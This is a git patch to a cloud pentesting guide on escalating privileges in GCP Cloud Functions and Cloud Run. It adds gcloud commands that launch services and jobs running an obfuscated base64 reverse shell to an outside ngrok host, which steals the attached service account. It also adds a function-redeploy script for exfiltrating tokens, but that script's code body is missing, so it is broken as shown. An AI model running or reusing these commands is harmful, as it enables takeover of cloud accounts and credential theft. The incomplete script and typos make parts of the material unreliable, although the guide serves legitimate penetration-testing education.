From 3a7140549eaf503bcff9594b0b1703760f979b7d Mon Sep 17 00:00:00 2001 From: CPol Date: Wed, 29 May 2024 10:45:04 +0000 Subject: [PATCH] GITBOOK-615: No subject --- .../gcp-cloudfunctions-privesc.md | 38 ++++++++++++++++++- .../gcp-run-privesc.md | 18 +++++++-- 2 files changed, 52 insertions(+), 4 deletions(-) diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md index 4dba7c386b..5941360959 100644 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md +++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md @@ -34,6 +34,38 @@ Exploit scripts for this method can be found [here](https://github.com/RhinoSecu An attacker with these privileges can **modify the code of a Function and even modify the service account attached** with the goal of exfiltrating the token.\ Some privileges to trigger the function might be required. +```bash +# Create new code +temp_dir=$(mktemp -d) + +cat > $temp_dir/main.py < $temp_dir/requirements.txt + +zip -r $temp_dir/function.zip $temp_dir/main.py $temp_dir/requirements.txt + +# Update code +gcloud functions deploy \ + --runtime python312 \ + --trigger-http \ + --source $temp_dir \ + --entry-point main \ + --service-account @$PROJECT_ID.iam.gserviceaccount.com \ + --allow-unauthenticated + +# If you don't have permissions to change the IAM policy, the "--allow-unauthenticated" will just fail and do nothing + +# Get SA tokin calling the new function code +gcloud functions call +``` + The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudfunctions.functions.update.py). ### `cloudfunctions.functions.sourceCodeSet` @@ -62,7 +94,11 @@ Only having **`cloudfunctions`** permissions, without **`iam.serviceAccounts.act ### Bucket Write Permissions -An attacker with **write permissions over the bucket** where the Cloud Functions code is stored will be able to **modify the code overwriting** the `function_code.zip` and will be able to **execute arbitrary** code once it's executed. +You might think that an attacker with **write permissions over the bucket** where the Cloud Functions code is stored will be able to **modify the code overwriting** the `function_code.zip` and then make the function **execute arbitrary** code. + +{% hint style="success" %} +**However, this isn't true, just overwriting the code inside the bucket won't modify the code that is being executed.** +{% endhint %} ## References diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md index 2267b72458..3c147ce5c0 100644 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md +++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md @@ -36,12 +36,14 @@ Like the previous one but updating a service: ```bash gcloud run deploy hacked \ ---image=marketplace.gcr.io/google/ubuntu2004 \ +--image=ubuntu:latest \ --command=bash \ --args="-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNy50Y3AuZXUubmdyb2suaW8vMTQ4NDEgMD4mMQ== | base64 -d | bash" \ --service-account="-compute@developer.gserviceaccount.com" \ --region=us-central1 \ --allow-unauthenticated + +# If you don't have permissions to use "--allow-unauthenticated", dont use it ``` ### `run.services.setIamPolicy` @@ -52,18 +54,28 @@ Give yourself previous permissions over cloud Run. Launch a job with a reverse shell to steal the service account indicated in the command. You can find an [**exploit here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/m-run.jobs.create.sh). +```bash +gcloud beta run jobs create jab-cloudrun-3326 \ +--image=ubuntu:latest \ +--command=bash \ +--args="-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNC50Y3AuZXUubmdyb2suaW8vMTIxMzIgMD4mMQ== | base64 -d | bash" \ +--service-account="@$PROJECT_ID.iam.gserviceaccount.com" \ +--region=us-central1 + +``` + ### `run.jobs.update`,`run.jobs.run`,`iam.serviceaccounts.actAs`,(`run.jobs.get`) Similar to the previous one it's possible to **update a job and update the SA**, the **command** and **execute it**: ```bash gcloud beta run jobs update hacked \ ---image=marketplace.gcr.io/google/ubuntu2004 \ +--image=mubuntu:latest \ --command=bash \ --args="-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNy50Y3AuZXUubmdyb2suaW8vMTQ4NDEgMD4mMQ== | base64 -d | bash" \ --service-account=-compute@developer.gserviceaccount.com \ --region=us-central1 \ ---project=security-devbox --execute-now +--execute-now ``` ### `run.jobs.setIamPolicy`